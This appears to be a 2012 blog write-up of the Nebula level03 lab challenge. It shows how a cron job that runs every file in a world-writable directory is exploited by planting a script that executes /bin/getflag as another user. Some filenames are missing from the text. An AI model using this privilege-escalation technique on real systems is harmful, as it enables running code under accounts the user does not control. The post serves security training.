Monday, October 29, 2012

exploit-exercises Nebula: level03

In level03 challenge of Nebula, we are told that there is a crontab running every couple of minutes.
[email protected]:/home/flag03$ ls -ltotal 8
drwxrwxrwx 2 flag03 flag03 4096 2012-10-29 03:03 writable.d
-rwxr-xr-x 1 flag03 flag03   98 2011-11-20 21:22
writable.d is a directory and as its name suggests, is world readable/writable. is the script that is executed every couple of minutes by the crontab.
[email protected]:/home/flag03$ cat #!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
The vulnerability lies in running every file that in the writable.d directory combined with the fact that writable.d is world writable.
To exploit this vulnerability, we will write a script that will run the /bin/getflag program when executed.
[email protected]:/home/flag03/writable.d$ echo "/bin/getflag >> /tmp/pwnlog03" > pwnie03
[email protected]:/home/flag03/writable.d$ cat pwnie03
/bin/getflag >> /tmp/pwnlog03
After some time, the pwnie03 script will be run (and deleted afterwards by
[email protected]:/home/flag03/writable.d$ ls
[email protected]:/home/flag03/writable.d$ cat /tmp/pwnlog03 

You have successfully executed getflag on a target account
And that is it, level03 done.

No comments:

Post a Comment